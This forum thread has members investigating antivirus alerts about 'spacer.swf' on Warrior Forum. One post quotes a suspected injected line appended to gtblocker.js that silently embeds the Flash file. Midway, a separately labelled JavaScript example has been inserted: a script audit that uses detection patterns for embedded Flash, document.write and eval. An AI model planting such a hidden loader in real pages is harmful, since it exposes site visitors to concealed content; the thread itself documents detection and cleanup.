Malicious spacer url on Warrior Forum!

20 replies
Is anyone seeing an alert about a malicious spacer URL on every page load in the WF?

I am using Kaspersky Internet Security

AussieT
#forum #malicious #spacer #url #warrior
  • Profile picture of the author topnichewebsites
    Nope, not I
    Signature
    http://pixelcovers.com/ <- eBook add eCovers

    https://www.unicommercesolutions.com <- WordPress Websites and Maintenance
  • Profile picture of the author JennySweets
    Yes! I came here to mention this too - I use ZoneAlarm and every time I load in anywhere here I get this

    FILENAME : spacer.swf TYPE: Virus RISK: High TREATMENT: Treated PATH: http://www.warriorforum.com/images/spacer.swf


    ZoneAlarm
    Antivirus web scanning detected a malicious link
    To protect you, this page has been blocked.
    URL:
    http://www.warriorforum.com/images/spacer.swf

    Been happening the last few hours.
  • Profile picture of the author Steve Wells
    I've notified Paul Myers, he knows about this for sure, he is/was befuddled, but I am sure they are looking into this...
  • Profile picture of the author salegurus
    Yip, also getting it...
    Signature
    Think of how stupid the average person is, and realize half of them are stupider than that.

    ― George Carlin
    • Profile picture of the author Paul Myers
      The weird thing is, I can't find any reference to a file named spacer.swf in the source of any page that isn't discussing this problem.


      Paul
      Signature
      .
      Stop by Paul's Pub - my little hangout on Facebook.

      • Profile picture of the author Joseph Then
        Originally Posted by Paul Myers View Post

        The weird thing is, I can't find any reference to a file named spacer.swf in the source of any page that isn't discussing this problem.
        Paul
        I didn't get any, maybe I'm using a mac. :p

        But, just to be sure, do you think you should contact the hosting company to help out? The hosting company usually have a virus scanner that scans the entire server.
      • Profile picture of the author sbucciarel
        Banned
        Originally Posted by Paul Myers View Post

        The weird thing is, I can't find any reference to a file named spacer.swf in the source of any page that isn't discussing this problem.

        Paul
        I know nothing about this really, but when I report cookie stuffers, the url used is often an alturl url but the cookie being stuffed is their website url, so some kind of workaround/redirect?

        EDIT: I see it's been fixed.
  • Profile picture of the author Andrew Davis
    The problem is likely being caused by this:
    http://www.warriorforum.com/gtblocker.js

    view-source:
    <script type="text/javascript" src="/gtblocker.js"></script>
    Signature
    Owner of: TrinSite, iOrbix, DesignCoverPhoto, KeywordCompetition ...and other Businesses


    Only $20! - >> Get your own PROFESSIONAL Facebook Timeline Cover << - Best Price - Best Quality
    (We are the #1 Facebook Cover Design Team in the WORLD!)
    • Profile picture of the author Steve Wells
      Originally Posted by Andrew Davis View Post

      The problem is likely being caused by this:
      http://www.warriorforum.com/gtblocker.js
      It does have the file name "images/spacer.swf" in it for sure....

      You may be onto something....
      • Profile picture of the author Kay King
        Getting the same errors - malicious-spacer and then gtblocker.js as the most recent error

        In Firefox I get the message "plugins deactivated for safety" and a reference to Java toolkit.
        Signature

        Saving one dog will not change the world - but forever changes the world for one dog.
        ***
        Sometimes people come into your life and they need to stop doing that...
        • Profile picture of the author Red Eagle
          [DELETED]
          • Profile picture of the author Paul Myers
            Andrew,

            Thanks. That's something I can point Thomas to. And it explains why I'm not seeing a filename when it's clearly being referenced somewhere.

            Much appreciated.

            It's very likely a false alarm, but it's better to look than not.


            Paul
            Signature
            .
            Stop by Paul's Pub - my little hangout on Facebook.

            • Profile picture of the author saunds
              PAUL MYERS: HOPE YOU LISTEN TO THAT JAMES BORG FELLA!

              MY COMPUTERS ACTIN REAL FUNNY LIKE SINCE I MADE A POST ON YOUR WEBSITE!

              Originally Posted by

              May not be a false alarm. Check the Oct 8 version of the file:

              http://web.archive.org/web/20131008014506/http://www.warriorforum.com/gtblocker.js

              A second line of obfuscated javascript has been added that pulls in the spacer.swf file. They've even taken pains to make it look as if it's part of gtblocker:

              Code:
              swfobject.embedSWF("http://www.warriorforum.com/images/spacer.swf","gtblocker","1","1","9.0"); document.write('<div id="gtblocker"></div>');
              Update: Looked at other sites using gtblocker.js, specifically version 2.3. None of them have that second line that pulls in spacer.swf.
    • Profile picture of the author mojojuju
      Originally Posted by Andrew Davis View Post

      The problem is likely being caused by this:
      http://www.warriorforum.com/gtblocker.js

      view-source:
      <script type="text/javascript" src="/gtblocker.js"></script>
      Goodness, why on earth is this forum still using that JavaScript to block the Google Side Wiki service - it's been discontinued for nearly 2 years!:p

      edit: I just recalled that I brought this up over a year ago here http://www.warriorforum.com/main-int...cript-now.html :rolleyes:
      Signature

      :)

  • Profile picture of the author Andrew Davis
    You're very welcome, Paul.

    Most likely, this script (gtblocker.js) was installed years ago, and has been forgotten in the WF source code.

    Apparently its purpose was to block "Google Sidewiki" (which is now discontinued): Google Sidewiki

    Recent Virus Definitions seem to consider the "spacer.swf" as a threat for some reason; most likely a false alarm, as you said.

    I think it would be safe for you or some Admin/Developer to remove that portion of code (below), and the script (gtblocker.js) from WF.

    <script type="text/javascript" src="/gtblocker.js"></script>

    Best regards!
    Signature
    Owner of: TrinSite, iOrbix, DesignCoverPhoto, KeywordCompetition ...and other Businesses


    Only $20! - >> Get your own PROFESSIONAL Facebook Timeline Cover << - Best Price - Best Quality
    (We are the #1 Facebook Cover Design Team in the WORLD!)
  • Profile picture of the author JamesBorg
    May not be a false alarm. Check the Oct 8 version of the file:

    http://web.archive.org/web/201310080...m/gtblocker.js

    A second line of obfuscated javascript has been added that pulls in the spacer.swf file. They've even taken pains to make it look as if it's part of gtblocker:

    Code:
    swfobject.embedSWF("http://www.warriorforum.com/images/spacer.swf","gtblocker","1","1","9.0"); document.write('<div id="gtblocker"></div>');
    Update: Looked at other sites using gtblocker.js, specifically version 2.3. None of them have that second line that pulls in spacer.swf.
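The check JamesBorg describes above (comparing the served gtblocker.js with a clean copy and spotting the extra line), as an added example that is not part of the original thread or of the site's code. BASELINE is a constructed stand-in for a known-good gtblocker.js and the function names are hypothetical; the appended line is the one quoted in the post.

```javascript
// Added example (not from the thread). BASELINE is a constructed stand-in for a
// known-good copy of the script; SERVED appends the line quoted in the post.
const BASELINE = [
  '/* gtblocker v2.3 (constructed stand-in) */',
  'function gtblock(){var n=document.getElementById("sidewiki");if(n){n.style.display="none";}}',
].join('\n');
const SERVED = BASELINE + '\n' +
  'swfobject.embedSWF("http://www.warriorforum.com/images/spacer.swf","gtblocker","1","1","9.0"); ' +
  'document.write(\'<div id="gtblocker"></div>\');';
// Patterns for statements that pull active content into the page.
const RULES = [
  ['flash-embed', /embedSWF\s*\(|\.swf\b/i],
  ['document-write', /document\.write(ln)?\s*\(/],
  ['dynamic-eval', /\beval\s*\(|new\s+Function\s*\(/],
  ['remote-element', /<\s*(script|iframe|object|embed)\b/i],
];
// Split on ';' and newlines, ignoring separators inside quoted strings.
// Naive on purpose: it does not understand comments or regex literals.
function splitStatements(src) {
  const out = [];
  let cur = '', quote = null;
  const flush = () => { if (cur.trim()) out.push(cur.trim()); cur = ''; };
  for (let i = 0; i < src.length; i++) {
    const ch = src[i];
    if (quote) {
      cur += ch;
      if (ch === '\\' && i + 1 < src.length) cur += src[++i];
      else if (ch === quote) quote = null;
    } else if (ch === '"' || ch === "'") { quote = ch; cur += ch; }
    else if (ch === ';' || ch === '\n') flush();
    else cur += ch;
  }
  flush();
  return out;
}
// Report every statement present in the served copy but not in the baseline,
// tagged with the rules it matches ("unclassified" still needs a human look).
function audit(baseline, served) {
  const known = new Set(splitStatements(baseline));
  return splitStatements(served)
    .filter((s) => !known.has(s))
    .map((s) => {
      const reasons = RULES.filter(([, re]) => re.test(s)).map(([name]) => name);
      return { statement: s, reasons: reasons.length ? reasons : ['unclassified'] };
    });
}
console.log(audit(BASELINE, SERVED));
```

Run against a copy of the script kept under version control, any non-empty result means the file on the server has changed since it was last reviewed.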
  • Profile picture of the author AussieT
    Thankfully it is being blocked by my virus software, just in case it is malicious.
  • Profile picture of the author xgnxghmchzhuang
    Banned
    [DELETED]
    • Profile picture of the author Horny Devil
      Banned
      The last 48hrs most of my visits to WF have resulted in Shockwave crashing. This has never happened before.
  • Profile picture of the author ecoverdesign
    Hello,

    The issue should have been fixed. Can you please check again to see if you still get the warning?

    Thanks!

    Thomas
    Signature

    Graphics Design, Development and Webmaster Services
    http://www.tbitdesign.com
